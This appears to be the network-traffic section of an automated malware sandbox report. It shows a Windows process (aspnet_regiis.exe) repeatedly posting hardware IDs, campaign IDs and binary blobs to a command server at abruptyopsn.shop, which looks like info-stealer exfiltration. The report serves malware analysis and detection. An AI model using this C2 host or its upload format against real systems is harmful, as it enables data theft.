                                                                                  Data Ascii: W/7weUqKOPY2UaQjrZQ1wMLgLA5EMshK3rDhCx0B5ZJO4LYqBMdktzRb4HTmtynNgvpwEAg/ywmO/eEJAg/6llr5sy8CgiLzOU6vJ6yPNsbN4DYCTjbGT9qwok1PBvDSBLKXOweBPeYGRKB95plw34LiMkkQeMpF3LDnBwcG65NQ9r0sDo4u8iFRpiKmiTDJzvcwDEg0hweWuvpDV0HZhVyyr28Txy37cxvgI6uUMsnC5D0NQz/BT9e+5wAKB+m
                                                                                  2024-12-30 20:09:06 UTC1369INData Raw: 79 6b 46 6c 53 2f 2b 4f 30 65 70 4c 4b 4b 4d 4d 38 48 43 34 44 4d 4d 54 44 62 44 54 74 61 78 37 51 51 48 44 75 79 53 55 37 4c 2b 59 51 32 66 61 71 39 7a 59 36 73 36 68 34 67 31 31 49 4c 36 63 42 41 49 50 38 73 4a 6a 76 33 73 43 67 34 4a 35 70 35 55 39 71 49 68 41 59 34 6c 39 6a 78 44 6f 79 32 73 6a 69 7a 41 77 75 34 32 44 6b 41 38 79 56 76 58 73 71 4a 4e 54 77 62 77 30 67 53 79 67 54 63 4e 67 43 57 31 47 6b 53 37 4c 61 79 46 4e 63 71 43 2b 6e 41 51 43 44 2f 4c 43 59 37 39 37 77 38 43 42 66 71 65 58 50 4b 35 4a 67 43 56 4a 66 67 2b 51 4b 41 70 74 49 63 73 79 63 6e 67 50 51 31 48 4e 38 74 42 33 50 32 73 51 77 67 5a 71 4d 6f 63 33 72 4d 77 41 4d 55 4e 37 53 56 45 72 44 32 74 69 7a 4b 47 33 61 73 6e 53 55 38 30 68 78 47 57 76 65 4d 4f 48 51 54 70 6d 46 62 2f
                                                                                  Data Ascii: ykFlS/+O0epLKKMM8HC4DMMTDbDTtax7QQHDuySU7L+YQ2faq9zY6s6h4g11IL6cBAIP8sJjv3sCg4J5p5U9qIhAY4l9jxDoy2sjizAwu42DkA8yVvXsqJNTwbw0gSygTcNgCW1GkS7LayFNcqC+nAQCD/LCY797w8CBfqeXPK5JgCVJfg+QKAptIcsycngPQ1HN8tB3P2sQwgZqMoc3rMwAMUN7SVErD2tizKG3asnSU80hxGWveMOHQTpmFb/
                                                                                  2024-12-30 20:09:06 UTC1369INData Raw: 5a 71 72 79 56 54 74 79 75 35 79 43 65 47 78 65 6c 2b 55 51 67 7a 79 45 66 62 74 75 59 4b 43 67 6e 72 6c 31 6e 34 76 43 30 4c 6a 79 50 39 4e 6b 61 6d 4a 71 57 49 4d 63 66 4f 34 54 63 48 51 58 69 4a 43 64 47 6c 6f 6c 74 50 4e 2f 69 56 52 50 2b 67 59 7a 69 45 4f 2b 59 6d 54 72 41 71 35 4b 6b 39 79 73 48 67 4f 52 6b 49 4a 34 6c 51 6c 72 72 75 51 31 64 42 36 4a 5a 51 38 62 63 76 42 59 6f 6c 38 44 68 4d 71 69 4b 30 69 54 76 4f 7a 75 30 7a 47 30 49 79 31 55 44 66 73 4f 77 4c 48 51 4b 6f 33 42 7a 31 71 47 46 53 78 78 6a 39 4d 45 2b 32 49 61 6e 47 49 59 6a 62 70 54 6b 46 43 47 43 48 57 38 53 39 36 51 4d 49 44 2f 71 54 56 50 32 36 49 51 79 4d 49 50 51 36 52 36 34 6c 6f 49 63 7a 78 38 50 6c 4f 77 6c 42 4b 73 6f 4a 6d 50 33 6c 47 30 39 5a 71 4b 56 51 2b 59 45 69 48
                                                                                  Data Ascii: ZqryVTtyu5yCeGxel+UQgzyEfbtuYKCgnrl1n4vC0LjyP9NkamJqWIMcfO4TcHQXiJCdGloltPN/iVRP+gYziEO+YmTrAq5Kk9ysHgORkIJ4lQlrruQ1dB6JZQ8bcvBYol8DhMqiK0iTvOzu0zG0Iy1UDfsOwLHQKo3Bz1qGFSxxj9ME+2IanGIYjbpTkFCGCHW8S96QMID/qTVP26IQyMIPQ6R64loIczx8PlOwlBKsoJmP3lG09ZqKVQ+YEiH
                                                                                  2024-12-30 20:09:06 UTC1369INData Raw: 33 55 75 42 30 39 74 52 6c 6b 35 47 79 62 6c 74 58 64 74 34 4a 77 50 32 36 55 55 46 42 2b 74 49 45 73 76 63 69 47 4a 55 73 39 43 56 41 35 78 4b 59 70 6a 58 4b 77 65 6b 2f 44 67 68 32 68 30 61 57 35 64 74 44 44 42 50 36 33 55 33 6b 76 54 45 4e 79 79 4c 6d 50 6b 2f 67 59 75 62 4b 4f 73 33 4f 34 44 6b 5a 42 79 72 58 51 74 71 72 72 67 63 64 51 61 62 53 54 66 6d 2f 4d 77 53 41 5a 65 59 6c 54 72 41 76 6f 34 46 79 7a 74 50 6f 4d 6b 6b 47 65 4e 4a 43 32 72 76 76 46 6b 41 51 2f 70 46 4b 39 66 77 70 47 34 6f 6d 74 77 77 4e 34 44 54 6d 33 6e 37 7a 77 65 73 77 44 6c 34 70 69 6d 6e 64 73 65 45 50 44 67 61 6f 33 42 7a 30 38 48 6c 5a 79 57 72 7a 49 67 50 34 66 50 54 64 61 35 57 56 74 57 77 57 42 69 47 48 58 35 62 6c 73 45 31 50 45 36 6a 4b 48 4c 57 7a 4d 78 69 42 4b 65
                                                                                  Data Ascii: 3UuB09tRlk5GybltXdt4JwP26UUFB+tIEsvciGJUs9CVA5xKYpjXKwek/Dgh2h0aW5dtDDBP63U3kvTENyyLmPk/gYubKOs3O4DkZByrXQtqrrgcdQabSTfm/MwSAZeYlTrAvo4FyztPoMkkGeNJC2rvvFkAQ/pFK9fwpG4omtwwN4DTm3n7zweswDl4pimndseEPDgao3Bz08HlZyWrzIgP4fPTda5WVtWwWBiGHX5blsE1PE6jKHLWzMxiBKe
                                                                                  2024-12-30 20:09:06 UTC1369INData Raw: 4b 71 57 51 50 59 48 38 32 78 73 45 52 54 33 4a 54 75 69 44 77 77 6b 66 44 4f 65 56 59 73 79 48 4d 41 32 58 61 4e 45 77 56 61 4e 73 36 4d 59 6d 68 70 71 6c 48 77 4e 59 4e 63 68 4f 6c 76 4f 69 42 30 39 5a 71 4c 64 52 2f 37 55 76 44 63 55 4c 2f 53 4e 4f 72 79 76 6d 79 48 37 4b 67 72 31 2b 43 45 49 6f 79 6b 62 52 38 65 55 5a 43 45 47 6d 30 6c 4b 79 36 47 45 4c 6a 54 72 36 50 45 54 73 4b 71 69 49 66 74 6d 4d 2f 48 34 66 43 47 43 55 42 35 61 76 6f 6c 74 50 52 75 61 66 58 66 47 2b 49 68 69 56 4c 50 51 6c 51 4f 63 53 6d 4b 4d 7a 79 38 66 72 4f 54 64 32 47 63 31 5a 32 37 4c 6c 51 53 38 47 2f 70 46 69 7a 49 63 77 44 5a 64 6f 30 54 42 56 6f 32 7a 6f 78 69 61 47 6d 71 55 66 41 31 67 31 79 45 36 55 6e 65 55 56 44 45 47 6d 30 6c 69 79 36 47 45 76 69 69 66 79 50 55 54
                                                                                  Data Ascii: KqWQPYH82xsERT3JTuiDwwkfDOeVYsyHMA2XaNEwVaNs6MYmhpqlHwNYNchOlvOiB09ZqLdR/7UvDcUL/SNOryvmyH7Kgr1+CEIoykbR8eUZCEGm0lKy6GELjTr6PETsKqiIftmM/H4fCGCUB5avoltPRuafXfG+IhiVLPQlQOcSmKMzy8frOTd2Gc1Z27LlQS8G/pFizIcwDZdo0TBVo2zoxiaGmqUfA1g1yE6UneUVDEGm0liy6GEviifyPUT


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.449733104.21.48.14432492C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-30 20:09:07 UTC281OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=8Q1SN741JY6N9PGIP
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 18164
                                                                                  Host: abruptyopsn.shop
                                                                                  2024-12-30 20:09:07 UTC15331OUTData Raw: 2d 2d 38 51 31 53 4e 37 34 31 4a 59 36 4e 39 50 47 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 38 51 31 53 4e 37 34 31 4a 59 36 4e 39 50 47 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 51 31 53 4e 37 34 31 4a 59 36 4e 39 50 47 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64
                                                                                  Data Ascii: --8Q1SN741JY6N9PGIPContent-Disposition: form-data; name="hwid"40C914AF947AA58D20A4C476FD51BCB1--8Q1SN741JY6N9PGIPContent-Disposition: form-data; name="pid"2--8Q1SN741JY6N9PGIPContent-Disposition: form-data; name="lid"HpOoIh--73f82eed
                                                                                  2024-12-30 20:09:07 UTC2833OUTData Raw: cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b
                                                                                  Data Ascii: xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
                                                                                  2024-12-30 20:09:09 UTC1132INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Dec 2024 20:09:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=gq85cvnu0gertgec9qgtumdjq3; expires=Fri, 25 Apr 2025 13:55:47 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FrCNRTUsEvWDoRMVheSPB8oyIkV%2FyeoZ9Y2wDFO4leBB2GpEpWGQYZkIG3%2BUtkI54CoGMzP4oojOldJ%2BfWt0fiS%2FAp7Quz2VucyiNRxO4kGIP8SYNOmXyx4wSGS0W9OI3%2Fvs"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fa4aa6fafdcc323-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1527&min_rtt=1522&rtt_var=581&sent=11&recv=22&lost=0&retrans=0&sent_bytes=3053&recv_bytes=19125&delivery_rate=2800511&cwnd=215&unsent_bytes=0&cid=69cc455f4e8464a4&ts=2110&x=0"
                                                                                  2024-12-30 20:09:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                  Data Ascii: fok 8.46.123.189
                                                                                  2024-12-30 20:09:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.449738104.21.48.14432492C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-30 20:09:10 UTC271OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=1MZ47H0K
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 8731
                                                                                  Host: abruptyopsn.shop
                                                                                  2024-12-30 20:09:10 UTC8731OUTData Raw: 2d 2d 31 4d 5a 34 37 48 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 31 4d 5a 34 37 48 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 4d 5a 34 37 48 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32 31 0d 0a 2d 2d 31 4d 5a 34 37 48 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                  Data Ascii: --1MZ47H0KContent-Disposition: form-data; name="hwid"40C914AF947AA58D20A4C476FD51BCB1--1MZ47H0KContent-Disposition: form-data; name="pid"2--1MZ47H0KContent-Disposition: form-data; name="lid"HpOoIh--73f82eed6521--1MZ47H0KContent-D
                                                                                  2024-12-30 20:09:10 UTC1123INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Dec 2024 20:09:10 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=6cqqq0b5vu0bnq8k4vg5otmfj5; expires=Fri, 25 Apr 2025 13:55:49 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=14WAIVg5TZOYflkt21SWwFVMZw5Il1ahiS%2B1UslpbbJpxXazlklaQFPmR7e2XXOCrPUBE5Y4iRj9Cq%2F7e7jmJVjbA8ddFAWXwZgnvfyEcSXOJwi3bYMQ7Dl%2BKQ41b2ay8PUq"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fa4aa80dd068cda-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1940&rtt_var=731&sent=9&recv=15&lost=0&retrans=0&sent_bytes=3051&recv_bytes=9660&delivery_rate=2239263&cwnd=243&unsent_bytes=0&cid=d5648ed98f9e2240&ts=473&x=0"
                                                                                  2024-12-30 20:09:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                  Data Ascii: fok 8.46.123.189
                                                                                  2024-12-30 20:09:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.449740104.21.48.14432492C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-30 20:09:11 UTC274OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=GPAI8DCFR4
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 20396
                                                                                  Host: abruptyopsn.shop
                                                                                  2024-12-30 20:09:11 UTC15331OUTData Raw: 2d 2d 47 50 41 49 38 44 43 46 52 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 47 50 41 49 38 44 43 46 52 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 50 41 49 38 44 43 46 52 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32 31 0d 0a 2d 2d 47 50 41 49 38 44 43 46 52 34 0d 0a 43
                                                                                  Data Ascii: --GPAI8DCFR4Content-Disposition: form-data; name="hwid"40C914AF947AA58D20A4C476FD51BCB1--GPAI8DCFR4Content-Disposition: form-data; name="pid"3--GPAI8DCFR4Content-Disposition: form-data; name="lid"HpOoIh--73f82eed6521--GPAI8DCFR4C
                                                                                  2024-12-30 20:09:11 UTC5065OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40
                                                                                  Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                                  2024-12-30 20:09:12 UTC1125INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Dec 2024 20:09:12 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=pnfmk9oqbesq885u05dgb2ug7r; expires=Fri, 25 Apr 2025 13:55:51 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O%2By76LTMLWSwIrVlo40Y0A8ixS%2BTLqBFmtzBv7TetPYq8o9RBTfpUdkT6LTBPNEaJukPl5aIXuidfeNOiJqmCultf9A0PVQQgpUvKMYjnUQYAAfRHaY0H27VLavvSaove%2FjW"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fa4aa890e52c461-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1555&rtt_var=587&sent=15&recv=26&lost=0&retrans=0&sent_bytes=3052&recv_bytes=21350&delivery_rate=2788033&cwnd=229&unsent_bytes=0&cid=38781dd075333470&ts=701&x=0"
                                                                                  2024-12-30 20:09:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                  Data Ascii: fok 8.46.123.189
                                                                                  2024-12-30 20:09:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.449742104.21.48.14432492C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-30 20:09:13 UTC279OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=XPL7PGYO3KAM3SH2
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 1265
                                                                                  Host: abruptyopsn.shop
                                                                                  2024-12-30 20:09:13 UTC1265OUTData Raw: 2d 2d 58 50 4c 37 50 47 59 4f 33 4b 41 4d 33 53 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 58 50 4c 37 50 47 59 4f 33 4b 41 4d 33 53 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 50 4c 37 50 47 59 4f 33 4b 41 4d 33 53 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32
                                                                                  Data Ascii: --XPL7PGYO3KAM3SH2Content-Disposition: form-data; name="hwid"40C914AF947AA58D20A4C476FD51BCB1--XPL7PGYO3KAM3SH2Content-Disposition: form-data; name="pid"1--XPL7PGYO3KAM3SH2Content-Disposition: form-data; name="lid"HpOoIh--73f82eed652
                                                                                  2024-12-30 20:09:13 UTC1128INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Dec 2024 20:09:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=f34rdua5r3a4imiqt2pvrgdbmf; expires=Fri, 25 Apr 2025 13:55:52 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVZTPKQcV3hzXfejKk5SECM7eorb9fZPBkctczxV2TwtqY%2FR82XNbaR2d%2F%2Fr28dHWFZvQrmOvbjFpfNBzIW%2BfVIdlwdtlE0ZLf%2Be5fSpaAoBEwvMVBZjIqvgBI%2BarcaCoJCl"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fa4aa9289ec43be-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1638&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3052&recv_bytes=2180&delivery_rate=2673992&cwnd=227&unsent_bytes=0&cid=3dd5249229169dfa&ts=315&x=0"
                                                                                  2024-12-30 20:09:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                  Data Ascii: fok 8.46.123.189
                                                                                  2024-12-30 20:09:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.449744104.21.48.14432492C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-30 20:09:14 UTC275OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=280R3H752XCO
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 1094
                                                                                  Host: abruptyopsn.shop
                                                                                  2024-12-30 20:09:14 UTC1094OUTData Raw: 2d 2d 32 38 30 52 33 48 37 35 32 58 43 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 32 38 30 52 33 48 37 35 32 58 43 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 38 30 52 33 48 37 35 32 58 43 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32 31 0d 0a 2d 2d 32 38 30 52 33 48 37
                                                                                  Data Ascii: --280R3H752XCOContent-Disposition: form-data; name="hwid"40C914AF947AA58D20A4C476FD51BCB1--280R3H752XCOContent-Disposition: form-data; name="pid"1--280R3H752XCOContent-Disposition: form-data; name="lid"HpOoIh--73f82eed6521--280R3H7
                                                                                  2024-12-30 20:09:15 UTC1121INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Dec 2024 20:09:15 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=dltdgf37ud5lcgflmgrj0vff64; expires=Fri, 25 Apr 2025 13:55:53 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
